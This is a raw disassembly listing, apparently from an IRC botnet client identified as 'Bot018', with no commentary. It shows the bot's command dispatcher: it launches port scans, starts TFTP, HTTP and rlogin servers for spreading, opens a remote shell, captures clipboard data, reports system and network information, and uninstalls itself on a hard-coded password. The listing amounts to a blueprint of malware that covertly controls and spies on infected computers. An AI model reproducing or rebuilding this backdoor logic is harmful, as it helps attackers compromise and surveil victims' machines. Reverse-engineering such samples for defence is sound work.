loc_40B38A: ; CODE XREF: sub_4078FA+3ACC�j
mov esi, edx
lea eax, [edi-28h]
loc_40B38F: ; CODE XREF: sub_4078FA+3AB1�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40B3B3
test cl, cl
jz short loc_40B3AD
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40B3B3
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40B38F
loc_40B3AD: ; CODE XREF: sub_4078FA+3A9F�j
xor esi, esi
xor eax, eax
jmp short loc_40B3BA
; ---------------------------------------------------------------------------
loc_40B3B3: ; CODE XREF: sub_4078FA+3A9B�j
; sub_4078FA+3AA9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40B3BA: ; CODE XREF: sub_4078FA+3AB7�j
cmp eax, esi
jz short loc_40B3CA
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40B38A
jmp short loc_40B3E4
; ---------------------------------------------------------------------------
loc_40B3CA: ; CODE XREF: sub_4078FA+3AC2�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40B3E4: ; CODE XREF: sub_4078FA+3A83�j
; sub_4078FA+3ACE�j
cmp [ebp+var_4E4], esi
jz loc_40B5F5
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40B48A
loc_40B46A: ; CODE XREF: sub_4078FA+3B8E�j
test eax, eax
jz short loc_40B48A
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40B46A
loc_40B48A: ; CODE XREF: sub_4078FA+3B6E�j
; sub_4078FA+3B72�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov ebx, 80h
lea eax, [ebp+var_5E8]
push ebx
push eax
mov [ebp+var_4B8], 1
call sub_412E0D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40B4F2
push eax
lea eax, [ebp+var_568]
push ebx
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B4F9
; ---------------------------------------------------------------------------
loc_40B4F2: ; CODE XREF: sub_4078FA+3BE3�j
and [ebp+var_568], 0
loc_40B4F9: ; CODE XREF: sub_4078FA+3BF6�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40B50D
mov eax, offset aSequential ; "Sequential"
loc_40B50D: ; CODE XREF: sub_4078FA+3C0C�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40B5EB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40B5A0: ; CODE XREF: sub_4078FA+3CF9�j
cmp [ebp+var_C], esi
jnz short loc_40B5C1
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B5C1: ; CODE XREF: sub_4078FA+3CA9�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B5CE: ; CODE XREF: sub_4078FA+3A52�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40B301
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B5E3: ; CODE XREF: sub_4078FA+3CF7�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B5EB: ; CODE XREF: sub_4078FA+3C89�j
cmp [ebp+var_4B4], esi
jz short loc_40B5E3
jmp short loc_40B5A0
; ---------------------------------------------------------------------------
loc_40B5F5: ; CODE XREF: sub_4078FA+3AF0�j
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40B60D: ; CODE XREF: sub_4078FA+1830�j
; sub_4078FA+1844�j
push 5
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40B631
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
loc_40B61E: ; CODE XREF: sub_4078FA+4E26�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
xor edi, edi
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_4078FA+3D1D�j
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40B656
push eax
lea eax, [ebp+var_74C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B665
; ---------------------------------------------------------------------------
loc_40B656: ; CODE XREF: sub_4078FA+3D47�j
push esi
lea eax, [ebp+var_74C]
push eax
push edi
call ds:dword_41F010 ; GetModuleFileNameA
loc_40B665: ; CODE XREF: sub_4078FA+3D5A�j
mov ebx, [ebp+ebx+var_9C]
cmp ebx, edi
jnz short loc_40B675
mov ebx, offset byte_42AED0
loc_40B675: ; CODE XREF: sub_4078FA+3D74�j
push ebx
lea eax, [ebp+var_648]
push esi
push eax
call sub_412E0D
mov eax, dword_42AE44
mov [ebp+var_53C], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_750], eax
lea eax, [ebp+var_538]
push eax
mov [ebp+var_540], edi
call sub_412C40
mov eax, [ebp+var_4]
mov [ebp+var_4B8], eax
mov eax, [ebp+var_C]
mov [ebp+var_4B4], eax
lea eax, [ebp+var_648]
push eax
lea eax, [ebp+var_74C]
push eax
push [ebp+var_53C]
lea eax, [ebp+var_2E0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 5
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_544], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_750]
push eax
push offset sub_410A22
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_544]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B757
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
loc_40B73B: ; CODE XREF: sub_4078FA+4F9C�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B74F: ; CODE XREF: sub_4078FA+3E63�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B757: ; CODE XREF: sub_4078FA+3E33�j
cmp [ebp+var_4B0], edi
jz short loc_40B74F
jmp loc_40C8C0
; ---------------------------------------------------------------------------
loc_40B764: ; CODE XREF: sub_4078FA+1808�j
; sub_4078FA+181C�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B783
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B783
push esi
call sub_412F42
pop ecx
jmp short loc_40B788
; ---------------------------------------------------------------------------
loc_40B783: ; CODE XREF: sub_4078FA+3E73�j
; sub_4078FA+3E7E�j
mov eax, dword_42AE48
loc_40B788: ; CODE XREF: sub_4078FA+3E87�j
mov ebx, [ebp+ebx+var_9C]
mov [ebp+var_C24], eax
xor eax, eax
cmp [ebp+var_448], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_C10], eax
jz short loc_40B7BD
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40B7E8
; ---------------------------------------------------------------------------
loc_40B7BD: ; CODE XREF: sub_4078FA+3EB0�j
push 104h
lea eax, [ebp+var_B74]
push eax
call ds:dword_41F040 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_B74]
push eax
call sub_4141AD
add esp, 14h
loc_40B7E8: ; CODE XREF: sub_4078FA+3EC1�j
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B7F1: ; CODE XREF: sub_4078FA+3EFC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B7F1
sub eax, edx
cmp [ebp+eax+var_D29], 5Ch
jnz short loc_40B81D
lea eax, [ebp+var_D28]
lea edx, [eax+1]
loc_40B80D: ; CODE XREF: sub_4078FA+3F18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40B80D
sub eax, edx
and [ebp+eax+var_D29], cl
loc_40B81D: ; CODE XREF: sub_4078FA+3F08�j
push [ebp+var_9C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_FB0]
push 80h
push eax
mov [ebp+var_FB4], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_C14], eax
lea eax, [ebp+var_D28]
push eax
push [ebp+var_C24]
mov [ebp+var_C18], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 4
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_C1C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FB4]
push eax
push offset sub_403E06
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C1C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40B8D8
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40B8D0: ; CODE XREF: sub_4078FA+3FE4�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40B8D8: ; CODE XREF: sub_4078FA+3FC3�j
cmp [ebp+var_C08], edi
jz short loc_40B8D0
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40B8E5: ; CODE XREF: sub_4078FA+17E0�j
; sub_4078FA+17F4�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40B904
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40B904
push esi
call sub_412F42
pop ecx
jmp short loc_40B909
; ---------------------------------------------------------------------------
loc_40B904: ; CODE XREF: sub_4078FA+3FF4�j
; sub_4078FA+3FFF�j
mov eax, dword_42AE4C
loc_40B909: ; CODE XREF: sub_4078FA+4008�j
mov [ebp+var_890], eax
mov eax, [ebp+ebx+var_9C]
xor edi, edi
cmp eax, edi
jnz short loc_40B922
lea eax, [ebp+var_E0]
loc_40B922: ; CODE XREF: sub_4078FA+4020�j
push eax
lea eax, [ebp+var_9D0]
push 40h
push eax
call sub_412E0D
mov ebx, [ebp+ebx+var_98]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40B944
mov ebx, 41FA76h
loc_40B944: ; CODE XREF: sub_4078FA+4043�j
push ebx
lea eax, [ebp+var_990]
push 100h
push eax
call sub_412E0D
push [ebp+var_9C]
lea eax, [ebp+var_A50]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_87C], eax
lea eax, [ebp+var_9D0]
push eax
push [ebp+var_890]
mov [ebp+var_A54], esi
push esi
mov [ebp+var_880], ebx
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 7
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_88C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A54]
push eax
push offset sub_40E219
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_88C]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40BA11
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40BA09: ; CODE XREF: sub_4078FA+411D�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BA11: ; CODE XREF: sub_4078FA+40FC�j
cmp [ebp+var_878], edi
jz short loc_40BA09
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40BA1E: ; CODE XREF: sub_4078FA+17B8�j
; sub_4078FA+17CC�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BA31
push ebx
call sub_412F42
jmp short loc_40BA38
; ---------------------------------------------------------------------------
loc_40BA31: ; CODE XREF: sub_4078FA+412D�j
push 9
call sub_4110F9
loc_40BA38: ; CODE XREF: sub_4078FA+4135�j
test eax, eax
pop ecx
jz loc_40CFE2
push eax
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40BF27
; ---------------------------------------------------------------------------
loc_40BA58: ; CODE XREF: sub_4078FA+1790�j
; sub_4078FA+17A4�j
mov eax, dword_433584
test eax, eax
jz short loc_40BA7B
call eax
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BA74
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA74: ; CODE XREF: sub_4078FA+4171�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA7B: ; CODE XREF: sub_4078FA+4165�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2E0]
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BA88: ; CODE XREF: sub_4078FA+1768�j
; sub_4078FA+177C�j
call sub_406B55
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40BAAC
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40BA9C: ; CODE XREF: sub_4078FA+4178�j
; sub_4078FA+417F�j ...
push 200h
push eax
call sub_412E0D
jmp loc_40C3B3
; ---------------------------------------------------------------------------
loc_40BAAC: ; CODE XREF: sub_4078FA+419B�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40BA9C
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_4078FA+1740�j
; sub_4078FA+1754�j
cmp [ebp+var_C], 0
jnz short loc_40BAD4
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BAD4: ; CODE XREF: sub_4078FA+41BD�j
push 0
push [ebp+var_4]
call sub_405792
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BAF7: ; CODE XREF: sub_4078FA+13B1�j
; sub_4078FA+13C5�j
push 8
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BB0D
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB0D: ; CODE XREF: sub_4078FA+4207�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_40DDC6
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40BB2C
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB2C: ; CODE XREF: sub_4078FA+4226�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40B1A8
; ---------------------------------------------------------------------------
loc_40BB36: ; CODE XREF: sub_4078FA+1389�j
; sub_4078FA+139D�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405277
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB4F: ; CODE XREF: sub_4078FA+1361�j
; sub_4078FA+1375�j
push [ebp+ebx+var_A0]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_402717
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_4078FA+1339�j
; sub_4078FA+134D�j
or esi, 0FFFFFFFFh
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov edi, eax
jz short loc_40BB94
push ebx
call sub_412F42
pop ecx
mov esi, eax
loc_40BB94: ; CODE XREF: sub_4078FA+428F�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40BBAC
cmp esi, 0FFFFFFFFh
jnz loc_40CFE2
loc_40BBAC: ; CODE XREF: sub_4078FA+42A7�j
push 0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
loc_40BBEB: ; CODE XREF: sub_4078FA+2412�j
add esp, 28h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BBF3: ; CODE XREF: sub_4078FA+1311�j
; sub_4078FA+1325�j
push 1Fh
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40BC29
cmp [ebp+var_C], 0
jnz loc_407B7B
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40BC13: ; CODE XREF: sub_4078FA+1F21�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BC29: ; CODE XREF: sub_4078FA+4303�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
and [ebp+var_3BC], 0
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3B4], eax
jz short loc_40BC8A
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40BC8A
mov [ebp+var_3BC], 1
loc_40BC8A: ; CODE XREF: sub_4078FA+4374�j
; sub_4078FA+4384�j
lea eax, [ebp+var_2E0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Fh
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_4073FB
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BD0C
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD04: ; CODE XREF: sub_4078FA+4418�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BD0C: ; CODE XREF: sub_4078FA+43E8�j
cmp [ebp+var_3B0], esi
jz short loc_40BD04
jmp loc_40ABEA
; ---------------------------------------------------------------------------
loc_40BD19: ; CODE XREF: sub_4078FA+12E9�j
; sub_4078FA+12FD�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz loc_407B7B
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40BD2F: ; CODE XREF: sub_4078FA+4451�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40BD51
test cl, cl
jz short loc_40BD4D
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40BD51
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40BD2F
loc_40BD4D: ; CODE XREF: sub_4078FA+443F�j
xor eax, eax
jmp short loc_40BD56
; ---------------------------------------------------------------------------
loc_40BD51: ; CODE XREF: sub_4078FA+443B�j
; sub_4078FA+4449�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40BD56: ; CODE XREF: sub_4078FA+4455�j
test eax, eax
jnz loc_407B7B
cmp [ebp+var_C], eax
jnz short loc_40BD7D
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40BD7D: ; CODE XREF: sub_4078FA+4467�j
push [ebp+arg_4]
call dword_4335AC
call dword_4335B8
call sub_405915
jmp loc_40C4C6
; ---------------------------------------------------------------------------
loc_40BD96: ; CODE XREF: sub_4078FA+12C1�j
; sub_4078FA+12D5�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push eax
call sub_40FE1F
pop ecx
pop ecx
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40BDF0
; ---------------------------------------------------------------------------
loc_40BDC2: ; CODE XREF: sub_4078FA+1299�j
; sub_4078FA+12AD�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40BDF0: ; CODE XREF: sub_4078FA+41F8�j
; sub_4078FA+44C6�j
call sub_401C33
loc_40BDF5: ; CODE XREF: sub_4078FA+3006�j
add esp, 18h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BDFD: ; CODE XREF: sub_4078FA+1271�j
; sub_4078FA+1285�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401CD3
loc_40BE11: ; CODE XREF: sub_4078FA+1E2�j
; sub_4078FA+4250�j ...
add esp, 10h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_4078FA+1249�j
; sub_4078FA+125D�j
and [ebp+var_B00], 0
cmp [ebp+var_14], 0
jz short loc_40BE5A
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40BE5A
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40BE5A
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_B00]
push 80h
push eax
call sub_412E0D
add esp, 10h
loc_40BE5A: ; CODE XREF: sub_4078FA+452A�j
; sub_4078FA+4535�j ...
push [ebp+var_9C]
lea eax, [ebp+var_B80]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_B84], eax
mov eax, [ebp+var_4]
mov [ebp+var_A7C], eax
mov eax, [ebp+var_C]
mov [ebp+var_A78], eax
lea eax, [ebp+var_2E0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 1Dh
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_A80], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_B84]
push eax
push offset sub_401D45
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_A80]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40BEFF
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40BEF7: ; CODE XREF: sub_4078FA+460B�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40BEFF: ; CODE XREF: sub_4078FA+45EA�j
cmp [ebp+var_A74], esi
jz short loc_40BEF7
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40BF0C: ; CODE XREF: sub_4078FA+1221�j
; sub_4078FA+1235�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401BBB
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401C33
loc_40BF27: ; CODE XREF: sub_4078FA+4159�j
add esp, 10h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40BF2F: ; CODE XREF: sub_4078FA+11F9�j
; sub_4078FA+120D�j
push [ebp+var_9C]
lea eax, [ebp+var_374]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_378], eax
mov eax, [ebp+var_4]
mov [ebp+var_2EC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2E8], eax
jz short loc_40BF88
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_2F0], eax
jmp short loc_40BF8F
; ---------------------------------------------------------------------------
loc_40BF88: ; CODE XREF: sub_4078FA+4673�j
and [ebp+var_2F0], 0
loc_40BF8F: ; CODE XREF: sub_4078FA+468C�j
lea eax, [ebp+var_2E0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 20h
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_378]
push eax
push offset sub_4111EB
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C011
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C009: ; CODE XREF: sub_4078FA+471D�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C011: ; CODE XREF: sub_4078FA+46ED�j
cmp [ebp+var_2E4], esi
jz short loc_40C009
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C01E: ; CODE XREF: sub_4078FA+117F�j
; sub_4078FA+1193�j
push offset aBot018 ; "Bot018"
lea eax, [ebp+var_2E0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C056: ; CODE XREF: sub_4078FA+1157�j
; sub_4078FA+116B�j
push dword_479BB0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C095: ; CODE XREF: sub_4078FA+112F�j
; sub_4078FA+1143�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C0C8
cmp [ebp+var_14], 0
jz short loc_40C0D7
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40C0D7
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 0Ch
jmp short loc_40C0D7
